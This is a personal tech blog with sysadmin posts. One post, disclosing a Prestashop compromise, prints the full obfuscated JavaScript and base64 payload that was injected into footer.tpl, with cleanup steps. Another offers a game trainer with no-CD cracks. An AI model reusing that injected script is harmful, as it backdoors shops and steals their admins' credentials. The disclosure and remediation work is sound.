Blog

  • Apache 2.4.64, SNI, and 421 Misdirected Request: cause and fix

    After upgrading to Apache 2.4.64 (or after applying linux vendors updates) many sites behind a reverse proxy started returning 421 Misdirected Request. The practical cause is simple: when your proxy makes an HTTPS connection to Apache, Apache now expects a correct TLS SNI value that matches the HTTP host. If the proxy omits SNI or sends a different name than the Host header, Apache can reject the request with 421. This change exposed default proxy settings that used to work by accident.

    What the 421 error means

    The HTTP 421 Misdirected Request status means the request reached a server that is not configured to respond for the combination of scheme and authority that you used. Browsers often reuse HTTP/2 connections across hosts if the server allows it, but Apache 2.4.64 tightened the checks so that connections without a matching SNI and Host are rejected. That is why you can see the error only on some requests or only on some subdomains after the update. The error message is the following:

    Misdirected Request

    The client needs a new connection for this request as the requested host name does not match the Server Name Indication (SNI) in use for this connection.

    Who is affected

    You are affected if a reverse proxy connects to Apache over HTTPS and does not pass SNI to the backend. This is common for nginx in front of Apache, HAProxy with HTTPS backends, and some CDNs or load balancers that re-encrypt to the origin. Panels that pair nginx and Apache (for example EA-Nginx on cPanel, Plesk, Hestia, and similar) were among the first to report 421 after the update.

    Fix: send the correct SNI to Apache and keep it consistent with Host

    The fix is to enable SNI on the upstream HTTPS hop and make its value match the HTTP Host that Apache should serve. Keep the connection private (VPC, VLAN, VPN, or same host) if you do not want the name visible outside your network. Do not roll back the Apache security update. Configure your proxy once and the 421 errors stop.

    nginx to Apache over HTTPS

    Enable SNI toward the backend and keep Host consistent.

    location / {
        proxy_pass              https://backend.example.com;
        proxy_set_header        Host $host;
        proxy_ssl_server_name   on;      # send SNI
        proxy_ssl_name          $host;   # SNI value
    [..]
    }

    HAProxy to Apache over HTTPS

    Pass the Host header as the SNI value on the TLS connection to Apache. Add verification settings that match your policy.

    backend app
        http-request set-header X-Forwarded-Proto https
        server app1 127.0.0.1:443 ssl sni req.hdr(Host)

    Apache to Apache with mod_proxy over HTTPS

    Use an https URL whose hostname is the site you want to serve so that Apache sends that name as SNI to the backend.

    SSLProxyEngine on
    ProxyPass        / https://site.example.com/
    ProxyPassReverse / https://site.example.com/

    How to test and confirm

    From the proxy host, curl the backend using the public hostname and the backend IP to confirm that SNI and Host agree. Watch your Apache error log for messages about missing SNI or a vhost mismatch while you test.

    curl -vk https://example.com/ --resolve example.com:443:127.0.0.1

    FAQ

    The 421 you see is produced by the stricter SNI and authority checks added around 2.4.64 and enforced by HTTP/2 handling. The cure is to send a correct SNI on the upstream connection and keep it consistent with Host.

    Do I need to verify the backend certificate for SNI to matter? No. Apache uses SNI during the TLS handshake to pick the correct SSL vhost and certificate before it even reads the HTTP request. Certificate verification by the proxy is a separate operational choice. The important part for avoiding 421 is that the SNI you send and the Host header you send resolve to the same Apache vhost, precisely the ServerName and ServerAlias directives. Matching the SNI with a domain in a certificate that is missing in the apache vhost directives will also fail.

  • Minecraft Linux Server Auto-Update

    Every time Mojang ships a new Bedrock build, your server goes stale. Clients update themselves, refuse to connect to an older server, and you are back to SSH, hunting down a zip, and copying files over your install while trying not to touch your worlds folder.

    This script does that for you. It checks the official download API, does nothing at all if you are already current, and if you are not, it swaps in the new server files while leaving your worlds and your configuration alone. Bedrock Dedicated Server on Linux only, not Java Edition.

    What the script does

    On every run it:

    1. Asks the official Minecraft download API for the current Linux Bedrock build.
    2. Compares that version against a small version file inside your server folder.
    3. Exits immediately if they match. Nothing is downloaded, nothing is touched.
    4. Otherwise downloads the zip to a temp folder, tests it for corruption, and confirms the server binary is in there.
    5. Copies the new files over your install with rsync, skipping your configs and your worlds.
    6. Records the new version number and cleans up.

    What it does not do:

    • It does not restart your server. The files get replaced, but the running process keeps serving the old version until it restarts. There is a section on this below.
    • It does not back up your worlds. It never touches them, but take backups anyway.
    • It does not remove files that disappeared from newer releases.

    Run it as the user that owns the server files. Nothing here needs root.

    Step 1: Install Dependencies

    sudo apt update
    sudo apt install curl jq unzip rsync wget

    Step 2: Create the Update Script

    Save the following as ~/update-bedrock.sh:

    #!/usr/bin/env bash
    set -euo pipefail
    
    HOME_DIR="$HOME"
    INSTALL_DIR="$HOME_DIR/bedrock-server"
    TMP_DIR="$HOME_DIR/bedrock-tmp"
    API_URL="https://net-secondary.web.minecraft-services.net/api/v1.0/download/links"
    ZIP_NAME="bedrock.zip"
    
    command -v jq >/dev/null || { echo "jq is required"; exit 1; }
    
    echo "Fetching version info..."
    DATA=$(curl -fsSL "$API_URL")
    DOWNLOAD_URL=$(echo "$DATA" | jq -r '.result.links[] | select(.downloadType == "serverBedrockLinux") | .downloadUrl')
    VERSION=$(basename "$DOWNLOAD_URL" | grep -o '[0-9.]\+')
    
    [[ -z "$DOWNLOAD_URL" || -z "$VERSION" ]] && { echo "Failed to extract URL/version"; exit 1; }
    
    [[ -f "$INSTALL_DIR/bedrock-server.version" && "$(cat "$INSTALL_DIR/bedrock-server.version")" == "$VERSION" ]] && {
      echo "Already up to date"
      exit 0
    }
    
    mkdir -p "$TMP_DIR"
    wget -q -O "$TMP_DIR/$ZIP_NAME" "$DOWNLOAD_URL"
    unzip -t "$TMP_DIR/$ZIP_NAME" >/dev/null || { echo "ZIP test failed"; exit 1; }
    unzip -oq "$TMP_DIR/$ZIP_NAME" -d "$TMP_DIR/unpacked"
    
    [[ -x "$TMP_DIR/unpacked/bedrock_server" ]] || { echo "Missing server binary"; exit 1; }
    
    rsync -a \
      --exclude='autoupdate.sh' \
      --exclude='server.properties' \
      --exclude='permissions.json' \
      --exclude='whitelist.json' \
      --exclude='ops.json' \
      --exclude='allowlist.json' \
      --exclude='valid_known_packs.json' \
      --exclude='worlds/' \
      "$TMP_DIR/unpacked/" "$INSTALL_DIR/"
    
    echo "$VERSION" > "$INSTALL_DIR/bedrock-server.version"
    rm -rf "$TMP_DIR"
    echo "Updated to version $VERSION"

    How it works

    The API returns a plain JSON list of the current download links, one per platform. The jq filter picks the entry tagged serverBedrockLinux. Swap that string for serverBedrockPreviewLinux if you want to follow preview builds, and keep preview builds away from worlds you care about. This is why the script does not scrape the download page. The old scraping scripts all broke when bot protection went up in front of it, and the API does not care what your user agent is.

    bedrock-server.version is a one line file the script writes into your server folder. It is not part of the official zip and the server never reads it. It is the script’s only memory, and it is what makes a daily cron job cheap: on a server that is already current, the entire run is one HTTPS request and an exit. Delete that file to force a clean reinstall of the current version.

    Everything downloads into a temp folder, never into the live server folder. unzip -t tests the archive before a single file is copied, so a truncated download or a full disk dies there instead of halfway through overwriting your server binary.

    Then rsync copies the new files in, and the excludes are what keep your server yours:

    • server.properties is your port, difficulty, gamemode, view distance, and everything else you tuned. The zip ships a default copy that would flatten it.
    • permissions.json and ops.json are your operator lists.
    • allowlist.json is the allowlist, and whitelist.json is what it used to be called. Both are excluded, so this works on old installs and new ones.
    • valid_known_packs.json lists the packs the server knows about. The server rewrites this file itself. If a release ever makes it complain about packs, delete the file and let it rebuild.
    • worlds/ is your saves. The one that matters.

    There is no --delete, so files that vanish from newer releases just stay behind. That wastes a little disk and it avoids the entire class of accident where one wrong exclude pattern eats a world.

    One quirk worth knowing: the character class in grep -o '[0-9.]\+' also matches the dot in front of zip, so the version comes out as 1.26.33.2 with a trailing dot on the end. Nothing breaks, because the same expression writes the version file and reads it back. If it bothers you in the log, use grep -oE '[0-9]+(\.[0-9]+)+' instead.

    Step 3: Make It Executable

    chmod +x ~/update-bedrock.sh

    Run it once by hand before you trust it to cron. On a clean box it doubles as the installer: the server folder does not exist yet, so rsync creates it and you never have to download the zip yourself.

    Step 4: Automate with Cron (Optional)

    Edit your crontab with crontab -e and add this line to check daily at 3 AM:

    0 3 * * * ~/update-bedrock.sh >> ~/bedrock-update.log 2>&1

    Put that in the crontab of the user that owns the server, not root. The script builds every path from $HOME, and root’s home is /root.

    Restart the server after an update

    This is the part that catches people out. rsync renames each new file into place, so replacing files under a live process does not crash it, but the running server keeps its old binary open. It carries on serving the old version, players still get told the server is out of date, and the script has already cheerfully printed Updated.

    The update is not finished until the server process restarts.

    Assuming your server runs as a systemd service called bedrock, add this just above the rsync block:

    SERVICE="bedrock"
    RESTART=0
    if systemctl is-active --quiet "$SERVICE"; then
      echo "Stopping $SERVICE..."
      sudo systemctl stop "$SERVICE"
      RESTART=1
    fi

    And this at the very end, after the version file is written:

    if [[ "$RESTART" == 1 ]]; then
      echo "Starting $SERVICE..."
      sudo systemctl start "$SERVICE"
    fi

    Because the script already exited earlier when there was nothing to do, this only ever fires on a real update. Your server is not bounced nightly for no reason.

    For cron to run those two commands without a password, add a narrow sudo rule with sudo visudo -f /etc/sudoers.d/bedrock-update, using your own username:

    minecraft ALL=(root) NOPASSWD: /usr/bin/systemctl stop bedrock, /usr/bin/systemctl start bedrock

    The server is stopped at that point anyway, which makes it the right moment for a world backup. Drop this in right after the stop:

    tar -czf "$HOME_DIR/worlds-$(date +%F).tar.gz" -C "$INSTALL_DIR" worlds

    Checking it worked

    What your install thinks it is running:

    cat ~/bedrock-server/bedrock-server.version

    What is actually current:

    curl -fsSL https://net-secondary.web.minecraft-services.net/api/v1.0/download/links \
      | jq -r '.result.links[] | select(.downloadType=="serverBedrockLinux") | .downloadUrl'

    Troubleshooting

    Failed to extract URL/version. The API is unreachable, or its JSON changed shape. Run the curl above by hand and look at what comes back. Your install has not been touched.

    ZIP test failed. Truncated download or a full disk. Check df -h and run it again.

    It says Updated but players still see the old version. The server was never restarted.

    Permission denied during the rsync. You ran the script as the wrong user. If you ran it once as root, fix the ownership with sudo chown -R minecraft:minecraft ~/bedrock-server.

    Cron never runs it. Check that the script is executable and that crontab -l shows the line under the right account. An empty log usually means the crontab belongs to another user.

    Done

    Your server now spots new releases on its own, refuses to touch anything if the download looks wrong, keeps your worlds and settings across every update, and comes back up on the new version without you logging in. Check the log now and then to make sure it is still saying what you expect.

  • Premier Manager 97 98 / PC Futbol 5 6 Trainer

    This is a trainer i made a long time ago with a friend for the PC Futbol / Premier Manager series. I plan on adding more to it everytime i find time 🙂

    If you have suggestions, please leave them in the comments!

    Here is the list of features:

    • No CD fix/crack(PM 97, PM 98, PCF 5, PCF 6)
    • Remove free space errors (PM 97, PM 98)
    • Unlimited transfers at a time (PM 97)
    • Sign/align unlimited non-EU players (PM 97, PM 98, PCF 5, PCF 6)
    • Sign players from teams with few players (fix the bug known as  “Romario bug”) (PM 97)
    • Players/Clubs always accept transfer offers (PM 97, PCF 5)
    • Scout search less restrictive (PM 97)
    • Fix CM (central midfielder) morale bug (lower minimal position boundary) (PM 97)

    Download here the latest version.

    Note: In Premier Manager 98 if you get the error “the game can’t be saved”, because you didn’t use the installer, you just need to create the folder “TACTICS” in the game folder. Also if you get funny colors, grab the latest DDrawCompat and unpack the ddraw.dll file to the game folder, you can download it here.

    Changelog:

    Version 0.16 (2026/01)

    Added “Fix CM morale bug (position boundary)” for Premier Manager 97

    Version 0.15 (2026/01)

    Added an option to directly run the games with patches applied, without saving a modified EXE

    Version 0.14

    Added “Sign unlimited non-EU players” for Premier Manager 98

    Added “Align unlimited non-EU players” for Premier Manager 98

    Version 0.13

    Added “No CD check” for Premier Manager 98

    Added “Remove free space errors” for Premier Manager 98

    Version 0.12

    Initial release

  • Check Akismet queue offline

    If you need to run akismet on a big queue, you can do it with this code and run it from the command line. Drop it at the root of your wordpress install (where is wp-config) and run it with the command line php.

    <?php
    require_once dirname(__FILE__) . “/wp-load.php”;
    if(!function_exists(‘get_plugins’)) {
    require_once ( ABSPATH . ‘wp-admin/includes/plugin.php’);
    }
    require ABSPATH . ‘wp-content/plugins/akismet/class.akismet-admin.php’;
    $_GET[‘recheckqueue’]=true;
    $_REQUEST[‘action’]=’akismet_recheck_queue’;
    $zz=new Akismet_Admin();
    $zz->recheck_queue();
    ?>

    (Edit: this shouldn’t be needed in newer versions of Akismet as you can do it from the panel).

  • Hotmail security hole plugged silently, no communication, no customer service

    A vulnerability in the Hotmail password reset pages, that allowed hackers to get access to ANY hotmail/MSN account, has been widely exploited over the past week.

    I found a video on Youtube dated April 12, which describes the security hole, which is trivial and only needs the modification of 1 email field during a request to the password reset page, when exploiting it , the password reset link would then be sent to an arbitrary email.

    My MSN/passport.net accounts (and many of my contacts) have been hacked briefly during the night from April 17 to April 18, i then informed MSRC about an unknown vulnerability in the password reset page, and it seems the vulnerability was plugged on April 19 or 20.

    What surprises me is the communication of Microsoft, there has been no public statement about the vulnerability, and all the hacked accounts have been permanently blocked and need to be unblocked manually by Microsoft employees. Some have been unblocked after asking on the forums answers.microsoft.com, but thousands remain blocked (every password reset, either through email, SMS or through the customer service don’t help).

    We are on April 24 and most of the users don’t even know this is the fault of Microsoft and i’m surprised they didn’t bother to help the hacked customers to get back their accounts, this is another big disappointment about the Microsoft security, communication and ethics.

    Other sites talking about the vulnerability:

    http://syria.telecomix.org/

    http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/

    http://hackingworldnews.blogspot.fr/2012/04/yet-another-hotmail-exploit-for-avril.html

     

    UPDATE 26/04:

    MSRC tweeted about the fix:

    https://twitter.com/#!/msftsecresponse/status/195568235654021121

    Got back my account after contacting the customer service, for this you need to follow the link on the page saying you’re blocked, and then login with a new (unblocked) account.. The mess ended.. At least, let’s hope so.

    Here is the direct link to the correct support page:

    http://windows.microsoft.com/en-us/windows-live/get-support?selectedproduct=Hotmail&selectedissue=Your%20account%20has%20been%20temporarily%20blocked&productKey=wolmain

  • Thepiratebay.se links blocked in MSN Messenger

    UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay!

    http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

    ——–

    Looks like thepiratebay.se links are blocked in MSN messenger, anybody who tries to send a link, even of the homepage, receives back an error:

    I’d be curious to know if it has been mistakenly categorized as a site containing viruses or if it was a move from Microsoft to “hit” thepiratebay and the revenue they generate from visits.

  • Alvotech Vserver VPS with OpenVPN

    Renting a server at Alvotech and thinking about installing OpenVPN? Then follow this tutorial.

    This tutorial has been done on the default configuration of the Alvotech VPS: Debian 5 64bit, and on Debian 6 64bit.

    The specs page of the vservers show that TUN/TAP is usable, but when you rent the VPS, no TUN interface is enabled.

    The first thing is to ask the support to enable it, after they say they did, you need to reboot your server through the control panel.

    Note that you don’t need any iptable rule, ip forwarding is enabled and you cannot add any iptable rule anyway, Alvotech will enable the necessary rules on the Host.

    Then enter your server through ssh and check ifconfig, you might have something like this:

    tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
    inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
    UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
    RX packets:11782 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8389 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:100
    RX bytes:1258182 (1.1 MiB) TX bytes:5467118 (5.2 MiB)

    Great, now do:

    apt-get install openvpn

    cd /etc/openvpn

    mkdir easy-rsa

    cp -r /usr/share/doc/openvpn/examples/easy-rsa/* easy-rsa/

    cd easy-rsa/2.0/

    source ./vars

    ./clean-all

    ./build-key-server server

    ./build-key client1

    ./build-dh

    ln -s /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys

    cd /etc/openvpn

    Now create a file server.conf with this content:

    port 1194
    proto udp
    dev tun2391-136 #Your TUN device in ifconfig
    ifconfig 10.0.2.97 10.0.2.98 # your TUN interface settings in ifconfig
    ifconfig-noexec
    route-noexec
    keepalive 10 120
    persist-key
    persist-tun
    comp-lzo
    verb 3
    fragment 1200
    mssfix 1200
    ca keys/ca.crt
    cert keys/server.crt
    key keys/server.key
    dh keys/dh1024.pem
    user nobody
    group nogroup
    tls-server
    push “dhcp-option DNS 8.8.8.8”

    Restart openvpn:

    /etc/init.d/openvpn restart

    Now copy the ca.crt client1.crt and client1.key on your client, and create a client.conf file (or client.ovpn) with this content:

    client
    dev tun
    proto udp
    remote 88.88.88.88 1194 #your server ip address/port
    resolv-retry infinite
    nobind
    persist-key
    persist-tun
    ca ca.crt
    cert client1.crt
    key client1.key
    ns-cert-type server
    comp-lzo
    verb 3
    ifconfig 10.0.2.98 10.0.2.97 #change it according to the IPs of your TUN interface, notice it is the CONTRARY of the server config
    redirect-gateway
    fragment 1200
    mssfix 1200

    And now just run “sudo openvpn client.conf”, on Windows you might need to adjust the paths to something like this: “cert c:\\Users\\admin\\desktop\\client1.crt” (for the key+certs).

    If you need another client to connect, just ask the support another TUN device (they added one on my server), copy server.conf to server2.conf, modify the TUN interface IPs/name + change the openvpn port in server2.conf, and don’t forget to generate a second client certificate!

    Enjoy!

    (thanks to the support @ Alvotech for providing the details i was missing)

  • Vshare / Widdit / searchcompletion.com Adware

    Vshare plugin *IS* an adware.

    Whether you are on Mac, Windows or Linux this is the same, and you don’t even need the toolbar, only the plugin.

    I’ve installed the old version of the Vshare plugin on my Firefox, on Linux, (old version because the newest isn’t available on Linux) then some popups started to appear on sites like wikipedia.org, loaded from some files hosted on widdit.com,  and leading to search.searchcompletion.com (a quick lookup on Google shows some Windows users also see this site as their main browser page, after installing Vshare).

    Widdit belongs to an Israeli company (SimplyGen), so does Vshare. Maybe both sites are from the same company.

    At this point i don’t know if it only adds some random popups or also does other nasty things (like replacing ads). I didn’t read any other article on the subject, so i decided to write this post. If you have other info, post it in the comments!

  • Prestashop XSS Worm (footer.tpl virus)

    Today i woke up and connected to a Prestashop site i’m setting up.
    I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines.
    I noticed a strange blank line in the footer.. DOH!

    When i looked, i had this code in the footer:

    <script>String.prototype.asd=function(){return String.fromCharCode;};
    Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;}
    catch(q){zxc={}[i];}v=document.createTextNode(‘asd’);
    var s=””;for(i in v)if(i==’childNodes’)o=v[i].length+1;o*=2;e=eval;
    m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o
    ,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,
    34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,
    113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,
    118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o
    ,42-o,102-o,48-o,105-o,103-o,118-o,70-o,
    99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,
    43-o,61-o,34-o,120-o,99-o,116-o,
    34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,
    104-o,116-o,113-o,111-o,69-o,106-o,
    99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o
    ,103-o,118-o,74-o,113-o,119-o,116-o,
    117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o
    ,119-o,111-o,103-o,112-o,118-o,
    48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o
    ,116-o,99-o,111-o,103-o,34-o,
    117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,
    49-o,101-o,110-o,107-o,101-o,
    109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,
    107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,
    41-o,34-o,121-o,107-o,102-o,118-o,
    106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,
    50-o,64-o,36-o,43-o,61-o];
    mm=”.asd();for(i=0;i<m.length;i++)s+
    =mm(e(“m”+”[“+”i”+”]”));e(s);</script>

    And this in footer.tpl was causing it:

    {literal}base64_decode(“PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlL
    mFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO3
    07T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWl
    mKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9
    W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgc
    z0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubG
    VuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1
    vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0
    LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyM
    C1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE
    2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMt
    bywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxM
    DItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLD
    EwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDg
    tbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8s
    NDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzL
    W8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My
    1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbyw
    xMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2L
    W8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA
    1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctby
    w0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDEx
    My1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4L
    W8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLD
    YyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC
    1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtby
    wxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMD
    ctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW
    8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMT
    AtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW
    8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLD
    EwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1
    vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1v
    XTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tK
    GUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=”){/literal}

    Also 2 PHP files were created in the upload/ and download/ folders which had the creation time set to the exact time i entered in the backend this morning!

    Apparently, Prestashop.com got compromised and somebody inserted a malicious script, which was executed in any admin’s browser window and that would make him backdoor his own site.

    All the infected shops employees’ credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

    The fix:
    Be sure to delete modules/her.php
    Remove the javascript code in the end of your footer.tpl theme files.
    Be sure to create these folders:
    tools/smarty/compile/
    tools/smarty/cache/

    Put back the htaccess files of upload/ and download/

    You can clear *.php files from upload/ and download/

    Clear ALL your cache.
    Move your admin folder.
    Reset your Mysql Password.
    Reset all your employees’ passwords!

    The vulnerability has been fixed on prestashop.com.

    This shows how including external content (html) is really risky and should be avoided at all cost. External content should always be parsed and displayed safely.

    More information on this thread:
    http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

    UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

    http://www.prestashop.com/blog/article/please_read_security_procedure/

  • xauth + (X11Forwarding Yes and X11UseLocalhost yes) == Still no Forwarding ?

    I was searching for this fix for quite some time. I couldn’t forward X anymore using “ssh -Y” or “ssh -X” on my debian server (i have xauth installed), i was always getting this error:

    ~$ xterm
    xterm Xt error: Can't open display:
    xterm:  DISPLAY is not set

    “X11UseLocalhost no” was making it working but this wasn’t the right solution..

    On this bug report i found out i had the same problem and the same symptoms: i had disabled ipv6 support, and this is what broke the forwarding!

    The solution is to add:

    AddressFamily inet

    in sshd_config! (or enable ipv6 again ;))